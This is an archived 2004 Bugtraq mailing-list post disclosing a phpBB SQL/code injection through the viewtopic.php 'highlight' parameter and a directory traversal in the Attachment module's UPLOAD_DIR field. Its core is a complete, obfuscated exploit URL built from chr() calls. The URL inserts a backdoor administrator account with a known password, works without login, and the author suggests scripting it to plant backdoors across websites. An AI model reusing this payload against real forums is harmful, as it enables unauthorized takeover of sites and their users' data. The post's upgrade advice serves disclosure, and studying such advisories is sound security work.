lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20041126192351.30351.qmail@webmail.aruba.it>
Date: Fri, 26 Nov 2004 20:23:51 +0100
From: zee@...bnc.it
To: bugtraq@...urityfocus.com
Subject: Phpbb id: 10701 update and Attachmodule add-on Directory Traversal


Phpbb: All vulnerable all except 2.0.11
Attachment module: All version vulnerable 

Howdark update opened wide my eyes with his nice exploit: 

Bugtraq id: 10701 

 -----
viewtopic.php?t=1&highlight=%2527
 ----- 

Looking at the code I saw that was possible inject any type of Sql query 
with a multiple char() functions. 

The following code can add an username with admin rights executing this 
query: 

INSERT INTO 
phpbb_users(user_id,user_active,username,user_password,user_level) VALUES 
('99999','1','ze3lock','ba3c83348bddf7b368b478ac06d3340e','1') 

And will be added to phpbb_users a new user with admin rights. 

*Note we can only execute a working query if we know the tables name. If not 
we can't. So this work only with a standard installation (usually 95% of 
websites ;-) 

username: ze3lock
pass: thepass 

The exploit can be run without being logged in and then you can have access 
with username. So it's quite simple to make it part of a script that could 
make backdoors around the web. 

For make it working just use the id of a working thread (in this case the 
thread is 30 - you can see it from the message) 

 --- Code start ---- 

http://site.com/forum/viewtopic.php?t=30&highlight=%2527%252emysql_query(chr 
(73)%252echr(78)%252echr(83)%252echr(69)%252echr(82)%252echr(84)%252echr(32) 
%252echr(73)%252echr(78)%252echr(84)%252echr(79)%252echr(32)%252echr(112)%25 
2echr(104)%252echr(112)%252echr(98)%252echr(98)%252echr(95)%252echr(117)%252 
echr(115)%252echr(101)%252echr(114)%252echr(115)%252echr(40)%252echr(117)%25 
2echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(105)%252echr(100)%2 
52echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%2 
52echr(97)%252echr(99)%252echr(116)%252echr(105)%252echr(118)%252echr(101)%2 
52echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(110)% 
252echr(97)%252echr(109)%252echr(101)%252echr(44)%252echr(117)%252echr(115)% 
252echr(101)%252echr(114)%252echr(95)%252echr(112)%252echr(97)%252echr(115)% 
252echr(115)%252echr(119)%252echr(111)%252echr(114)%252echr(100)%252echr(44) 
%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(108 
)%252echr(101)%252echr(118)%252echr(101)%252echr(108)%252echr(41)%252echr(32 
)%252echr(86)%252echr(65)%252echr(76)%252echr(85)%252echr(69)%252echr(83)%25 
2echr(32)%252echr(40)%252echr(39)%252echr(57)%252echr(57)%252echr(57)%252ech 
r(57)%252echr(57)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39 
)%252echr(44)%252echr(39)%252echr(122)%252echr(101)%252echr(51)%252echr(108) 
%252echr(111)%252echr(99)%252echr(107)%252echr(39)%252echr(44)%252echr(39)%2 
52echr(98)%252echr(97)%252echr(51)%252echr(99)%252echr(56)%252echr(51)%252ec 
hr(51)%252echr(52)%252echr(56)%252echr(98)%252echr(100)%252echr(100)%252echr 
(102)%252echr(55)%252echr(98)%252echr(51)%252echr(54)%252echr(56)%252echr(98 
)%252echr(52)%252echr(55)%252echr(56)%252echr(97)%252echr(99)%252echr(48)%25 
2echr(54)%252echr(100)%252echr(51)%252echr(51)%252echr(52)%252echr(48)%252ec 
hr(101)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr( 
41))%252e%2527 

 --- code end --- 

 ------------ Attach Module ---------------- 


In the attach module, I found a directory traversal in the "UPLOAD_DIR" 
field. 

This is the directory where all attachments are supposted to be uploaded. 

The field accept any kind of character so you can put instead of 'files' 
'../../' and all the attachments will be uploaded in the '../..? directory. 

That's really dangerous for defacements threat. 


 --------------- Suggestion ------------------ 

Please, upgrade to version 2.0.11 and add an input validation to UPLOAD_DIR 
field in attach module. 

Zeelock 



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ